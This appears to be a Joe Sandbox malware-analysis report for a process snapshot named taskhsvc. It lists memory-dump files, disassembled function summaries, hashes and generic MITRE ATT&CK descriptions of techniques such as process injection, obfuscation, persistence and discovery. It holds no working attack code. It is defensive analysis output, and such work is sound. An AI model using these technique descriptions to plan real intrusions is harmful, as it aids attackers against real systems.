Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr
String ID: $h$(p
API String ID: 797389190-1055756447
Opcode ID: 0e2508112aa01ebb57aabce4068774779c4c7efa765766770b6307cac4b16f4a
Instruction ID: fc9bc0c5b4c2939dafc7d4d5c22b78926e66ef074b17758322ba45e27ee6cbf9
Opcode Fuzzy Hash: 0e2508112aa01ebb57aabce4068774779c4c7efa765766770b6307cac4b16f4a
Instruction Fuzzy Hash: E841E5B4A0070ACFCB00EF69D58599EBBF1FF49304F058958E498AB3A5D338E885DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A0EC Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314COMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EF23BF: strlen.MSVCRT ref: 00EF23E1
Part of subcall function 00EF23BF: strncmp.MSVCRT ref: 00EF23FD
Part of subcall function 00EF23BF: __stack_chk_fail.LIBSSP-0 ref: 00EF240D

__stack_chk_fail.LIBSSP-0 ref: 00E7A5AA

Part of subcall function 00E7A5B1: strlen.MSVCRT ref: 00E7A5CD
Part of subcall function 00E7A5B1: __stack_chk_fail.LIBSSP-0 ref: 00E7A63D

Strings

SMETHOD-ERROR, xrefs: 00E7A30B
CMETHOD-ERROR, xrefs: 00E7A2CE

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strlen$strncmp
String ID: CMETHOD-ERROR$SMETHOD-ERROR
API String ID: 2270347309-182006444
Opcode ID: 00f16edcd79e0663395109c01a090cfa0fa0e469e7bd7e5c265ee900e0ea1022
Instruction ID: fc2bebae39f6b955afdb3e020b33f21e53af769e0fcd414c95d1b33306d333ab
Opcode Fuzzy Hash: 00f16edcd79e0663395109c01a090cfa0fa0e469e7bd7e5c265ee900e0ea1022
Instruction Fuzzy Hash: B2D195B4A093198FCB14DF64C5845AEBBF4BF89704F15E829E898EB301E339D8459F12

Uniqueness

Uniqueness Score: -1.00%

Function 00DE70D3 Relevance: 7.7, APIs: 5, Instructions: 167COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DE7125

Part of subcall function 00DE6F53: memset.MSVCRT ref: 00DE6F9A
Part of subcall function 00DE6F53: abort.MSVCRT ref: 00DE70B9
Part of subcall function 00DE6F53: __stack_chk_fail.LIBSSP-0 ref: 00DE70CC

abort.MSVCRT ref: 00DE716C
abort.MSVCRT ref: 00DE71B6
__stack_chk_fail.LIBSSP-0 ref: 00DE736B

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort$strrchr$memset
String ID:
API String ID: 854832852-0
Opcode ID: de6b87918f96287b4fd2dc88df2c149d4c3402def923c90613f1b4181c8db997
Instruction ID: b321e5c4dd7e751b456a96ff36a99bc319eb32bc93fe6d1269379bc02334bae3
Opcode Fuzzy Hash: de6b87918f96287b4fd2dc88df2c149d4c3402def923c90613f1b4181c8db997
Instruction Fuzzy Hash: 8671D4B0909349AFCB40EFA6D449A6EBBF0BF44344F05881DF9949B352D778D844DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F170F6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00F15FB8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00F1710E), ref: 00F16032

memcmp.MSVCRT ref: 00F1719F
memcmp.MSVCRT ref: 00F17202
__stack_chk_fail.LIBSSP-0 ref: 00F17270

Strings

@, xrefs: 00F171EC

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failmemcmp
String ID: @
API String ID: 1611709857-2766056989
Opcode ID: 02d9564b05e1287beb9b95a1950aebd93811070a4f757d5effa4bd6bb8d8afac
Instruction ID: 4ef58d91857dc0ea3a612326ef95818dcfac374c0f541ff75133f9bc89cc0faf
Opcode Fuzzy Hash: 02d9564b05e1287beb9b95a1950aebd93811070a4f757d5effa4bd6bb8d8afac
Instruction Fuzzy Hash: 5C412974A08745CFDB10EF64C884BDAB7F4BF85314F108999A89897380E734DA85AF52

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
